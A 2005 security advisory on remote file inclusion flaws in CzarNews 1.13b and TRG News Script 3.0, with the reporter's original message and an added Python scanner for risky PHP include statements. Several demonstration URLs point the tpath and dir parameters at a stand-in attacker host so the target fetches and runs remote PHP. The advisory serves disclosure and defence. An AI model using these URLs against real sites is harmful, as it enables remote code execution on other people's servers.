SecurityTracker.com
Category:  Application (Forum/Board/Portal)  >  CzarNews
Vendors:  Czaries Network
CzarNews Include File Hole Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1013486
SecurityTracker URL:  http://securitytracker.com/id?1013486
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Mar 21 2005
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.13b
Description:  Frank 'brOmstar' Reissner from [In]Security Research reported a vulnerability in CzarNews. A remote user can execute arbitrary commands on the target system.

Several scripts use a request parameter as the directory prefix of a PHP include without validating it. In CzarNews, headlines.php and news.php both execute require_once($tpath . "cn_config.php") without first assigning $tpath, so with 'register_globals' enabled a remote user can set 'tpath' in the query string to the URL of a server they control. PHP then fetches cn_config.php from that server and executes it on the target web service. The included PHP code, including any operating system commands it invokes, runs with the privileges of the target web service.

The following files are affected:

headlines.php
news.php

The same report describes an equivalent flaw in TRG News Script 3.0, where install\article.php, install\authorall.php, install\comment.php, install\display.php, install\displayall.php and other files include "$dir/..." with an unvalidated 'dir' parameter (see the source message below).

If 'register_globals' and 'allow_url_fopen' are set to 'on' in the 'php.ini' configuration file, then this flaw can be exploited. The product's listed requirements include 'safe_mode' off, so that setting is assumed as well. On PHP 5.2 and later, including a URL additionally requires 'allow_url_include' to be 'on'; 'register_globals' was removed in PHP 5.4. Turning off URL wrappers blocks only the remote variant: with 'register_globals' on, the include path is still taken from the request.

A demonstration exploit URL that causes the target to fetch and execute 'cn_config.php' from the attacker's system is provided:

http://[target]/research/news/CzarNewsv113b/headlines.php?tpath=http://[attacker]/

news.php is exploitable in the same way; the file on the attacker's server must be named cn_config.php.
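Finding every affected file by hand is what the reporter's "and many more files" points at. The following Python script is an added example, not part of this advisory or of either product's code: it scans PHP source for include/require statements whose path starts with a variable (the shape of both require_once($tpath . "cn_config.php") and include("$dir/newsconfig.php") quoted in the source message below) and separates those from includes where a variable only follows a fixed prefix. The sample source it runs on is constructed for the example and is not the actual CzarNews or TRG News code; the statement regex is a line-based heuristic and misses statements that span lines.

```python
import re
from typing import List, NamedTuple

# Constructed PHP sample modelled on the fragments quoted in the advisory.
# It is NOT the CzarNews or TRG News source; line numbers refer to this string.
SAMPLE_PHP = r'''<?php
require_once($tpath . "cn_config.php");
include("$dir/newsconfig.php");
include("$dir/authorall.class.php");
require_once(dirname(__FILE__) . "/cn_config.php");
include 'lib/safe.php';
include($pages[$page]);
include("templates/" . $skin . ".php");
$tpath = "./templates/";
'''


class Finding(NamedTuple):
    line: int
    keyword: str
    argument: str
    remote_capable: bool  # the path prefix is a variable, so a URL wrapper fits


# include/require with or without parentheses, terminated by ';' on the same line
INCLUDE_RE = re.compile(
    r'\b(?P<kw>include_once|require_once|include|require)\b'
    r'\s*\(?\s*(?P<arg>[^;]+?)\s*\)?\s*;'
)
VAR_RE = re.compile(r'\$[A-Za-z_]\w*')
# Argument that begins with a bare variable ($tpath . "...") or with an
# interpolated variable inside a double-quoted string ("$dir/...")
PREFIX_VAR_RE = re.compile(r'^(?:\$[A-Za-z_]\w*|"\$\{?[A-Za-z_]\w*)')


def scan_includes(php_source: str) -> List[Finding]:
    """Return every include/require whose path depends on a variable.

    remote_capable is True when the variable is the *prefix* of the path:
    with register_globals on, a request parameter can then supply
    'http://attacker/' and PHP's URL wrappers fetch the file remotely.
    A variable that only follows a fixed prefix cannot reach a URL but is
    still reported, since it may still select other local files.
    """
    findings: List[Finding] = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        m = INCLUDE_RE.search(line)
        if not m:
            continue
        arg = m.group('arg').strip()
        if not VAR_RE.search(arg):
            continue  # fixed path: not attacker-influenced
        findings.append(Finding(lineno, m.group('kw'), arg,
                                bool(PREFIX_VAR_RE.match(arg))))
    return findings


def remote_capable_lines(php_source: str) -> List[int]:
    """Line numbers of includes that can be turned into remote file inclusion."""
    return [f.line for f in scan_includes(php_source) if f.remote_capable]


if __name__ == '__main__':
    for f in scan_includes(SAMPLE_PHP):
        tag = 'RFI-capable' if f.remote_capable else 'variable path'
        print(f'line {f.line}: {f.keyword}({f.argument})  [{tag}]')
```

Run against a real tree with `find . -name '*.php'` feeding each file to scan_includes; the "RFI-capable" hits are the ones to fix first, by assigning the prefix in code rather than reading it from the request.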

Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.czaries.net/scripts/
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Frank Reissner <mail@frank-reissner.de>
Message History:   None.


 Source Message Contents

Date:  Sun, 20 Mar 2005 11:21:06 +0100
From:  Frank_Reiner <mail@frank-reissner.de>
Subject:  Two Php Application Vulnerabilities

 
 
Two little vulns I have discovered
 
#################################################################
#
#  [In]Security Research 2005-001 	
#
#  	Affected Software: 	CzarNews (v1.13b) 
#	Impact:			Remote File Inclusion	
#	Url:			http://www.czaries.net/scripts/
#	
#	Author:			Frank 'brOmstar' Reißner
#	Date:			2k5-03-18
#
#################################################################
 
Software:
=========
 
CzarNews (v1.13b)
News Manager - Requires: php 4.x (safe_mode OFF), MySQL
Released on: 10-13-2004 @ 7:17 PM by Czaries
A free full-featured news manager that allows you to post news effortlessly and easily.
Includes: Unlimited users, each with custom permissions, unlimited posting categories, web-based configuration, and a complete auto-installer for a quick setup in minutes.
 
 
 
Vulnerability:
==============
 
Remote file inclusion in headlines.php and news.php via the tpath parameter.
 
 
headlines.php
-------------
 
require_once($tpath . "cn_config.php");
 
 
news.php
--------
 
require_once($tpath . "cn_config.php");
 
 
Example:
========
 
If register_globals=on and allow_url_fopen=on:
 
http://192.168.0.115/research/news/CzarNewsv113b/headlines.php?tpath=http://attackerip/
http://192.168.0.115/research/news/CzarNewsv113b/news.php?tpath=http://attackerip/
 
where the file for inclusion must be named cn_config.php ->
http://attackerip/cn_config.php
 
 
Solution:
=========
 
Make a simple check if the file exists with the file_exists function or
deactivate register_globals || allow_url_fopen.
 
 
#################################################################
 
greetings 2 buzzdee and the whole gsO team  ;) 
 
 
 
 
 
And 
 
#################################################################
#
#  [In]Security Research 2005-002 	
#
#  	Affected Software: 	TRG News Script(3.0)
#	Impact:			Remote File Inclusion	
#	Url:			http://www.hotscripts.com/jump.php?listing_id=17852&jump_type=1
#	
#	Author:			Frank 'brOmstar' Reißner
#	Date:			2k5-03-19
#
#################################################################
 
Software:
=========
 
The TRG News Script is an easily customizable news posting script. By simply
pasting a small block of code on your page, the TRG News Script will display
your newly posted material there. This script requires an SQL database.
 
 
Vulnerability:
==============
 
Remote file inclusion in 
 
install\article.php
install\authorall.php
install\comment.php
install\display.php
install\displayall.php
 
 
and many more files
 
 
via the dir parameter.
 
 
include("$dir/newsconfig.php");
 
or
 
include("$dir/authorall.class.php");
 
or 
 
include("$dir/comments.class.php");
 
or
 
include("$dir/news.class.php");
 
or
 
include("$dir/newsall.class.php");
 
or
 
and more and more  ;) 
 
 
Example:
========
 
If register_globals=on and allow_url_fopen=on:
 
http://192.168.0.115/research/news/trg_news30/trgnews/install/article.php?dir=http://attackerip/
 
where the file for inclusion must be named newsconfig.php ->
http://attackerip/newsconfig.php
 
 
Solution:
=========
 
Make a simple check if the file exists with the file_exists function or
deactivate register_globals || allow_url_fopen.
 
 
#################################################################
 
greetings 2 buzzdee and the whole gsO team  ;) 
 
 
 
Frank 'brOmstar' Reißner
 


Copyright 2005, SecurityGlobal.net LLC